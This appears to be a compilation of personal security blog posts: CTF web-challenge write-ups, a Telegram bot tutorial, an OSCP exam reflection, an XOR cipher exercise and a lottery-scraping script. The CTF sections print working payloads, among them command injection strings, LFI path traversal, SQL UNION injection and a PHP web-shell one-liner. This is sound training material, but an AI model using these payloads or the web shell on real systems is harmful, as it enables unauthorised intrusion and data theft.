 var rotFlag = flag.replace(/[a-zA-Z]/g, function(c){
 return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);});
 if ("TYHT{py13a7_51q3_y061a_j17u_e0713!}" == rotFlag) {
 alert("Correct flag!");
 } else {
 alert("Incorrect flag, rot again");
 }
 }
 </script>

 </body>
</html>

This is a challenge which has the flag hardcoded in its javascript. However, it is ROT13-ed and therefore you are required to provide the CORRECT flag to 'match' the logic. Putting the matching condition from the source code into cyberchef (google it), will give you the flag. GLUG{cl13n7_51d3_l061n_w17h_r0713!}

The Videogame

One fine day,Rocket Raccoon found the video game that Groot was so obsessed with.Unfortunately,Groot had set a password on it. In the password hint,he had provided link to a website. Raccoon could not find anything in the website. Can you help him find it, so that he can play the videogame?

http://104.248.49.223:7071/

This is a challenge which requires the user to change the cookie. Examining the cookie, it shows user:unknown. Changing it to user:ROOT and reloading the page will give us the flag. GLUG{I_@m_7r55t}

Referals

Misha recently got placed at Google.So she started refering her friends for incoming job posts in the company.She hid a secret in this website for those who got the job after her referal.The secret contains the place where she and her friends will be having party for their new jobs.

Minan is Misha's boyfriend.Minan wants to reach Misha asap.Since Minan didnt get a job at google and is a noob,Can you help him figure out the location?

http://104.248.49.223:8081/

This challenge requires us to craft a HTTP header with referer = https://www.google.com in it. Simply do a CURL request with --referer https://www.google.com in the curl request to the site and the flag will be given. GLUG{Refendrum_@_007}

MI7

Olny Agents are allowed.

MI7 Members Secret Vault

https://mi7secret-glugctf.netlify.com/

MI7 was a department in the British Directorate of Military Intelligence in both the First and Second World War. The group, which was part of British Military Intelligence, was established to control propaganda and censorship. It was part of the War Office.



Even Google is allowed to see our secrets. You are not an agent! How dare you, to be here !!

So at first, this challenge looked like a user-agent challenge. But reading the last line, tells us otherwise. Google bots are used to crawl the internet for site indexing, and robots.txt might be the place we should be looking at.

Visiting https://mi7secret-glugctf.netlify.com/robots.txt will show us a list of URLs.

User-agent: *
Disallow: /cyberworld/map/
Disallow: /tmp/
Disallow: /fsck.bf
Disallow: /a7_vault.html
Disallow: /exploits/fuzzbunch/Eternal_pink
Disallow: /exploits/network/QuantumInjection.pdf

Following the URL https://mi7secret-glugctf.netlify.com/a7_vault.html will give us a BASE64 encoded string: R0xVR3tiMDc1X2M0bl8xNm4wcjNfN2gzX3J1bDM1fQ==, subsequently, decoding it will give us a flag. GLUG{b075_c4n_16n0r3_7h3_rul35}

Musically

We can have a list of songs.And a search input where a user can search for a song along with details.
Link to the Challenge
http://142.93.207.206:7004/

Link to the source code
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="master.css">
    <title>ctf</title>
  </head>
  <body>
    <div class="wrap">
      <form method="post" class="search">
        <input type="text" class="searchTerm" placeholder="Enter a filter.." name=needle>
              <button type="submit" class="searchButton" name=submi>
                <i class="fa fa-search"></i>
             </button>
           </form>

      <div class="output">
        <h6>Here are top reccommendations:</h6>
        <pre><?php
        $key = ".";

        if(array_key_exists("needle", $_REQUEST)) {
            $key = $_REQUEST["needle"];
        }

        if($key != "") {
        passthru("grep -i $key songs.txt");
        }
        ?>
        </pre>
      </div>
</div>
  </body>
</html>

This is a typical command injection challenge. There are no filters, and therefore command injection can be done directly. Supplying ;ls; will allow us to list files. Since flag.txt is in the same directory, doing a ;cat flag.txt; will allow us to read the flag. Therefore, the flag is: GLUG{you_never_gonna_find_song}

New Blogger

Misha is a travel blogger.She made a website for her blog.Minan was very impressed with it but on detailed inspection found that there existed a vulnerability.
Can you find the flag exploiting the same?

Hint: Flag is in /etc/flag

Link
http://104.248.49.223:7074/

This challenge is a Local File Inclusion (LFI) challenge. The LFI was identified when playing around with the links in the site. Clicking on About Us will load About Us page. But looking at the URL, http://104.248.49.223:7074/?page=about-us.php was seen, and changing it to http://104.248.49.223:7074/?page=../../../../../../../../etc/flag gives us the flag. GLUG{7h3_54m3_0ld_f1l3_1nclu510n}

NinjaGirl

NInJa_gIrl thinks MD5 is amazing.She uses one salt to hash all her data. All you need to do is enter two different names and prove her that she’s wrong?
Link to the Challenge
http://104.248.49.223:7075/

Here is the source code: link
https://ghostbin.com/paste/seah6
Flag is in format: Glug{}

<?php
  include 'secret.php';
  if($_GET["str1"] and $_GET["str2"]) {
    if ($_GET["str1"] !== $_GET["str2"] and
        hash("md5", $salt . $_GET["str1"]) === hash("md5", $salt . $_GET["str2"])) {
      echo $flag;
    } else {
      echo "Sorry, you're wrong.";
    }
    exit();
  }
?>

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CTF</title>
    <link href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet">
    <style media="screen">
      body{
        font-family: 'Audiowide', cursive;
        background-color: #ff4;
        padding: auto;
        text-align: center;
      }
      input{
        margin:1rem;
      }
    </style>
  </head>
  <body>
    <h1>
      Ninja Girl welcomes you.<br>
    </h1>
    <h3>Please enter your and your opponent's name.</h3>
    <form method="GET">
      Fighter 1: <input type="text" name="str1">
      <br>
      Fighter 2: <input type="text" name="str2">
      <br>
      <input type="submit" value="submit">
    </form>
    <img src="ninja.png" alt="" height="300px" width="300px">
  </body>
</html>

This is basically a challenge where you are required to overcome the PHP code logic. To match the logics, we would need to supply the GET parameters with arrays. Because when PHP converts an array into string, it would be a string value called Array instead of the values in it. Therefore, a literal conversion with the salt would still give the same hashes. The following code snippet can be tested and you would see testArray as the eventual text, even though both arrays have different values.

<?php
/* Write your PHP code here */
$A = [1];
$B = [2];
echo "test" . $A;
# PHP Notice: Array to string conversion in index.php 5
# testArray <-- from $A
echo "test" . $B;
# PHP Notice: Array to string conversion in index.php 7
# testArray <-- from $B

?>

Therefore, the solve for this would be ?str1[]=1&str2[]=2, giving us the flag Glug{7i5e_1s_####123_7577}.

The Infinity War

Thanos has acquired half of the gems and soon coming on the earth for the Time stone.All the marvel heroes have therfore united to fight with him.
But as they needed one person to lead them,they organised an election to choose one leader.
But since Loki received least number of votes. He got jealous and mixed up the votes,and hid the result.
Can you find it?
This link will lead you to the vote counts.
http://167.99.149.173/
Flag is in the format Glug{}

This is a typical SQL injection question. Requiring the user to do a UNION SELECT injection. After enumerating columns and table names using ' UNION SELECT table_name,column_name,2,3 FROM information_schema.columns;##, the payload required is ' UNION SELECT IhidItHere,2,3,4 FROM Leaders;##, giving us the flag Glug{3@st_!r0nm@n_1s_3est}

Pingmaster

Phonix made a new tool called “Pingmaster”. He hosted it in his server, as he is a poor person and couldn’t afford multiple servers he also kept his secret in it. But he thinks it really secure.
Prove him wrong.
Link to the challenge
http://104.248.49.223:7090/
Tip: Flag is in /etc/flag

This is yet another command injection challenge, but there are filters. Giving symbols like &,SPACE, or | would trigger the filter. However, since the commands are executed and the standard output is then printed, we can try the %0A escape method. %0A would add a new line, like a press of the ENTER key. Since SPACE is not allowed, we will have to use $IFS$9 to insert spaces. But for this to work, instead of sending it through the form, we will have to send the GET request directly to prevent our symbols from being URL encoded. Therefore, the payload for the command would be http://104.248.49.223:7090/?host=%0Acat$IFS$9/etc/flag, and the flag is GLUG{c40mm4nd_1nj3c710n_w17h0u7_5c4p35_15_l337}.

THATS ALL FOLKS! I LOVE WEB!

A file upload web challenge during the recent noxCTF 2018.

The following was presented:

Uploading a file without extensions would give us this:

It appears that the code checks for extensions .png .jpg .gif. Uploading a valid extension would give us a link to the image.

Following the link will give us the full path of upload location:

http://[url]/uploads/[file_name.png]

Navigating one level up to the /uploads directory, listing was enabled and an interesting directory was discovered.

Existing file name redacted to prevent spoiler (they are PHP web shells. LOL)

Of course /Don't open/ directory is kinda suspicious, and inside is a htaccess file which provides a juicy info on how the server reads certain extensions.

Options +Indexes
AddType application/x-httpd-php .cyb3r

This meant that, any files with a .cyb3r extension would be treated as a PHP file!.

Lets try to upload our own PHP Code execution backdoor.

This is a simple one liner:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Saved this PHP file as fux.png.cyb3r.

It accepted my PHP backdoor!

Now following the given link, I should be able to load the page as a PHP page, and giving it a cmd get parameter should run system commands.

http://[url]/uploads/fux.png.cyb3r?cmd=id;pwd

Time to get flag

A little digging shows that two directories are owned by root, and both directory can be read globally. Since the directories are the only two directories which are created at the time of attempting this question, using wildcard in my ls command would list all directories which match the wildcard requirement.
http://[url]/uploads/fux.png.cyb3r?cmd=ls%20-la%20./*

The flag is the in the 7H3-FL4G-1S-H3r3 directory, and listing it shows the flag noxCTF{N3V3R_7RU57_07H3R5}

I have always been fascinated by how chat bots work!

With the trend of the telegram phone app being popular among students, Chat Bots have become a new medium for application interaction.

From digitizing social games like "werewolf" to informational services like getting the latest news update, chat bots have made its way to take those roles, and it has become a source of leisure and information for frequent telegram users.

So here I am, sharing that learning journey on creating my very first Telegram Bot.

Requirements on creating a telegram chat bot:
Python knowledge
Django knowledge
Simple NGINX service knowledge

Required resources:
Django framework
A VPS cloud
Telegram API Key
Python
Python telepot library

I have used the following git project by Adil Khashtamov to setup the telegram bot. The codes are available at https://github.com/adilkhash/planetpython_telegrambot

Step 1 (obtain telegram bot secret key)

To obtain the bot secret key, you will have to use your existing telegram account to start a conversation with @BotFather. This bot will walk you through on creating a new bot. Start by typing /start followed by /newbot. BotFather will ask for a name for your bot and a username for your bot. For example, you can name your bot as MyFirstApp, and you can set the username as MyFirstAppBot. Note down the username of your bot, as you will only be able to search your bot in telegram with the username, in which with reference to the example @MyFirstAppBot.

Step 2 (Understanding telepot, and your first interaction)

First, install telepot.
pip install telepot
Or simply google the correct method for the version of python in which you are using. Once telepot is installed, ensure that your teelgram bot secret key from Step 1 is working. You can do this doing a basic information grabbing method.

import telepot
token = 'your telegram secret key'
TelegramBot = telepot.Bot(token)
print TelegramBot.getMe()

Once done you should get a response with your Bot name and bot username with an ID.

Next, open up your telegram app and start interacting with your Bot. Search your bot by adding a @ followed by the bot username. Once you have a dialog, send a string the the bot. Let's use /start as an example.

Once you have sent a message, alter your python script by adding the following line TelegramBot.getUpdates().

You should get an update on what messages are being sent out with various ID information such as update ID and chat ID. This ID uniquely identifies the chat. Thus, it is important to know how chats are being identified for future debugging purpose

Time to ignore the codes above, and code some real bot features.

Step 3 (NGINX, Django, and all the Environment Variables)

According to google, "NGINX is a web server which can also be used as a reverse proxy, load balancer, mail proxy and HTTP cache." In Short, NGINX is a web server SERVICE which allows application to be hosted. Our telegram bot functions will be hosted on a server running NGINX. You may use your own VPS Cloud server to run this, or spin up a local VM on your machine bridged to the local network which you are in, along with Network Address Translation rules to ensure traffic from the internet going to your public IP will reach your VM. For simplicity, I have used a server from Digital Ocean, a paid VPS which allows me to host my telegram bot functions.

Refer to Adil Khashtamov site on configuring and setting the server up: https://khashtamov.com/en/how-to-deploy-telegram-bot-django/

Step 4 (Getting it running, inserting your code)

If you can get Step 3 running (using Adil's codes), you are one step closer on creating your own bot! (Successfully implementing step 3 means you are able to run this telegram bot functions from your bot. If you are able to achieve this, you are almost there. All that is left right now is replacing his logics with yours and call them!)

Assuming your codes are running right in Step 3, all you need to do is change the codes at view.py. This is the file in which functions will be inserted.

To understand how the code works, the important information required for the 'reply' function for the bot to reply the use is this following piece of code in view.py:

..
..
chat_id = payload['message']['chat']['id']
cmd = payload['message'].get('text')
..
..

Therefore, to visualize the underlying mechanism of how the bot replies, it is something like this:

1. User starts conversation
2. Bot recieves various information including chat_id and message 
3. Bot uses the chat_id to identify which 'chat' to reply to
4. Bot sends whatever that is required.

So assuming you just want your bot to reply "Hello World", all you had to add was TelegramBot.sendMessage(chat_id, 'Hello World') right after the bot receives the chat_id and sent message.

To summarize the "reply" portion, it is important to place the TelegramBot.sendMessage(chat_id, 'Reply message here') code right after your functions. For instance, you want to pull data off certain API. You will first need to pull the data before placing the code. Take that piece of code as a 'return' function for a telegram bot.

Lastly, once your code is ready, configure gunicorn and supervisord, according to the link in: https://khashtamov.com/en/how-to-deploy-telegram-bot-django/

Once your services are up, test your bot!
*NOTE: if any changes were made to the codes, you are required to restart the service by using supervisord.

It starts with a "what if? What if I could achieve it?".

According to many, OSCP is one of the hardest out there.

No Metasploit, No automatic tools. Just plain old manual enumeration and exploitation.

I think this OSCP journey has been a really great. I have have learnt so much from my failures, as I have re-took the exam multiple times.

Looking back almost a year ago where I passed the CEHv9 exam, I have gained so much knowledge and hands on experience in what we call the "Cybersecurity Industry".

CTFs are like playgrounds right now, especially CTFTime, VulnHub and HTB.

It took me all the way to the 4th try to get that email which contains "congratulations..".

Quick summary of the 5 machines:

Rooted:
25 points - Buffer overflow (standard procedure)
10 points - PHP Code Execution
20 points - Vulnerable web application leading to RCE into a low privilege shell, priviledge escalation achieved through outdated vulnerable Linux kernel.
25 points - Vulnerable implementation of a python web application leading to RCE into a low privilege shell, privilege escalation achieved through vulnerable sudo.

Got a local low privilege account on the final machine through multiple vulnerabilities. SQLi, leading to authentication to a misconfigured FTP, subsequently gaining remote access to accounts through password attack from the misconfigured FTP service.

TL;DR

I'll share the 5 must have before taking an OSCP.

1. Windows, Linux and Network infrastructure knowledge
2. How web application works, the components, and the types of attacks
3. Enumeration techniques
4. Occasional password attack (knowing your systems well, at point number 1)
5. Patience, and lots of coffee.

1) Windows, Linux and Network infrastructure knowledge

I started off as an infrastructure student back at polytechnic, where I gained built my foundation on using the linux terminal and windows active directory environment. It was second nature to me, to use the terminal to interact with a UNIX base system. But after taking the OSCP exam, I realize how little I know about the internals of Windows. So to be prepared for OSCP, is to also the fundalmentals of Windows, Linux and Networking infrastructure knowledge at your fingertips

2) How web application works, the components, and the types of attacks

SPOILER ALERT. Since most of the attack vectors in OSCP/PWK were web vectors, it is important to understand how web applications communicate and process information. From using Burp to intercept a message and modify it, to manual SQL injection or command injection attacks, these are some of the vulnerabilities that OSCP/PWK tend to have on their machines. (You know some attack vectors right?) So know the difference between a GET or POST parameter would also be useful, as you would have a better gauge on how the web application communicates. This habit is also being brought forward to the REAL WORLD. Certain contracted work which I have done as a freelance inherited certain skills or lessons which I have picked up during the PWK/OSCP sessions. Or, just play more CTFs!

3) Enumeration techniques

Probably the MOST important skill needed in the OSCP exam. If you can't see it, you won't see it! Nmap, Unicornscan, Dirb, Gobuster, Nikto, and any other scanning tools will not be sufficient. It also requires one important factor, "Curiousity". Enuemration can't be taught, but self taught. Think about the day which you have to learn something new, and only you can teach yourself. That is the feeling which I had. No matter how many articles I read or reviews, it all boils down to this: "Which way of enumeration are you most comfortable with?". Well, to sum it up, enumeration is matter of getting as much information as possible for your next phase which is either gaining a shell, or popping a root/administrator shell. :)

4) Occasional password attack (knowing your systems well, at point number 1)

Yes, occasional password attack. Seems like an outdated thing? PWK/OSCP has it! In fact, if a developer does not have good practices, you might land yourself on a password cracking scenario! Well, in PWK/OSCP, you will learn how to crack passwords such as Linux passwords, or Windows passwords. Of course, you will learn the mitigations as well! But I personally think that this is an important factor because, it could make your life WAY easier, if you could just "remote in" the machine right? Why bother kicking the front door when you have the key?

5) Patience, and lots of coffee.

Lastly, patience. TONS. OF. IT. I must say, the countless times which I have been restless in the first two attempts when I am not getting anything. Being composed and having the patience to look for "something new" in the systems is VERY important. In fact, it is like trying to guess 'what could have the user had done, which I might be able to exploit?'. This is significant, as it makes or break your exam!

Probably CPSA to get my CRT next? Or hop into EC-Council's LPT? I'll ask myself that 'What if?' question again soon.

Thats all!

Here are my favourite resources for sharing!!

Priv-Escalation readings:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.fuzzysecurity.com/tutorials/16.html
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Cheatsheets:
https://www.stationx.net/nmap-cheat-sheet/
https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/
https://blog.cloudflare.com/inside-shellshock/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/os-cmd-execution

I finally have the luxury of time to learn new things, in which I decided to beef up some of my cryptography knowledge. A basic cryptography category in which certain CTFs present is a classic XOR challenge.

Being a person with ZERO knowledge in cryptography, some research were needed. So in a nutshell, XOR is the operation of taking 2 bits, putting in through the XOR operation or also known as ^.

Some XOR rules:
1 ^ 1 = 0
1 ^ 0 = 1
0 ^ 1 = 1
0 ^ 0 = 0

Since XOR works at the bit level, in order to encryt a message like ATTACK AT DAWN, the message needs to be in bit representation before taking each for a spin in the XOR operator.

As this was just a simple practice, I decided to expeirment using a single key. Take the example of the following.

Message is ATTACK AT DAWN
Key chosen is H

So to encrypt that message using XOR, which individual character have to be XOR-ed by the key, therefore a conersion was needed. Thankfully, converting from string to bits was easy, by using the following bin(ord('a')), then putting it into a list (Using python over here).

Since some of the XOR cipher text is not readable as text, I encoded the cipher text in base64 to make it "transportable". In which, a decode is needed before passing the message through the decryption process.

Here is the code sample code for encryption and decryption:

import base64
#Encryption

cipher_bits = []

input_string = 'ATTACK AT DAWN'
key = 'H'
print "XOR Key: " + key
key_bin = (bin(ord(key)))[2:]
key_left_zeros = '0' * (8-len(key_bin))
new_key_bin = key_left_zeros + key_bin
# print new_key_bin

str_bits = []
for ch in input_string:
	tmp_bit = (bin(ord(ch)))[2:]
	bit_left_zeros = '0' * (8 - len(tmp_bit))
	new_bit = bit_left_zeros + tmp_bit
	str_bits.append(list(new_bit))


# print str_bits

temp_bits = ''
for i in range(len(str_bits)):
	for j in range(len(str_bits[i])):
		temp_bits += str(int(str_bits[i][j]) ^ int(new_key_bin[j]))
	cipher_bits.append(list(temp_bits))
	temp_bits = ''

# print cipher_bits

tmp_bits_holder = []
for i in range(len(cipher_bits)):
	tmp_bits_holder.append(''.join(cipher_bits[i]))

# print tmp_bits_holder

tmp_cipher_text = ''
tmp_ch_holder = ''
for i in range(len(tmp_bits_holder)):
	tmp_ch_holder = chr(int(tmp_bits_holder[i],2))
	tmp_cipher_text += tmp_ch_holder
	tmp_ch_holder = ''
new_cipher_text = base64.b64encode(tmp_cipher_text)
print "XOR RAW Encrypted" + tmp_cipher_text
print "XOR RAW Encrypted Encoded: " + new_cipher_text




#Decryption
cipher_text = base64.b64decode(new_cipher_text)
cipher_str_bits = []
for ch in cipher_text:
	c_tmp_bit = (bin(ord(ch)))[2:]
	c_bit_left_zeros = '0' * (8 - len(c_tmp_bit))
	c_new_bit = c_bit_left_zeros + c_tmp_bit
	cipher_str_bits.append(list(c_new_bit))

# print cipher_str_bits

c_temp_bits = ''
message_bits = []
for i in range(len(cipher_str_bits)):
	for j in range(len(cipher_str_bits[i])):
		c_temp_bits += str(int(cipher_str_bits[i][j]) ^ int(new_key_bin[j]))
	message_bits.append(list(c_temp_bits))
	c_temp_bits = ''
# print message_bits
tmp_message_bolder = []
for bits in message_bits:
	tmp_message_bolder.append(''.join(bits))

decrypted_message = ''
for i in tmp_message_bolder:
	decrypted_message += chr(int(i,2))

print "XOR Decrypted: " + decrypted_message

DISCLAIMER: NO OFFENSIVE ACTIONS WERE DONE, CODES ARE PURELY FOR EDUCATION PURPOSE OF WHAT PYTHON CAN DO.

Background

Inspired by a friend who asked if it was possible to get historical data of 4D lottery numbers from the official website using a python script.

It got me thinking, can I apply and of my CTF knowledge to get those data?

Advanture

I did some research, and found out that a python libray called BeautifulSoup allows us to get specific tags within a given html output.

The lottery page uses a GET paramter to pass in the arguments which will then be processed by the back end server to get the data needed. The variable was passed in as a base64 encoded variable, and it was tagged with a "draw" number, as each lottery draw has a draw number.

Scripting and Testing

After watching a video on how is BeaustifulSoup used, I coded a sample script to get the latest draw, and it worked! So what's left was doing a historical lookup using the "draw numbers", and store the results in a text file for further analytics next! (Soup anyone?)

Lesson

Even though this is not a CTF related challenge or real world encounter, the concept of web scrapping in a non-offensive environment can be used in an offensive environment if the codes were tweaked. I personally think that it can be used for information gathering and reconnaissance on any target of interest. It could also be a CTF challenge... Hmm... Inspirations everyday!

The Code

NOTE: Url of the lottery site removed to avoid any trouble.

import requests
import base64
from bs4 import BeautifulSoup as soup
import time


#The draw number you want. Typically 4 digits
# EXAMPLE: draw_number = 4284
# Edit: using loop for draw_number to get multiple draws

for draw_number in range(1000,4284):
	time.sleep(1)
	#Build the base64 paramter
	try:
		param_builder = 'DrawNumber=' + str(draw_number)
		encoded_draw_number = base64.b64encode(param_builder.encode('utf-8'))
		get_param = encoded_draw_number.decode('utf-8')

		#Build the url
		url = '[REMOVED URL]' + get_param

		# Generated_list
		number_list = []

		#Invoke the GET request
		r = requests.get(url)

		#Read the request
		web_reply = r.text

		page_soup = soup(web_reply,"html.parser")
		base_table = (page_soup.findAll("div",{"class":"tables-wrap"}))[0]

		draw_date = str(base_table.findAll("th",{"class":"drawDate"})[0])
		draw_date_text = draw_date[(draw_date.find('<th class="drawDate">')+21):draw_date.find('</th>')]

		starter_table = base_table.findAll("td")

		for nums in starter_table:
			number = str(nums)
			number_list.append(number[(number.find('</td>')-4):number.find('</td>')])

		for items in number_list:
			with open('4d_history.txt','a') as file:
				 file.write(items + '\n')
	except:
		pass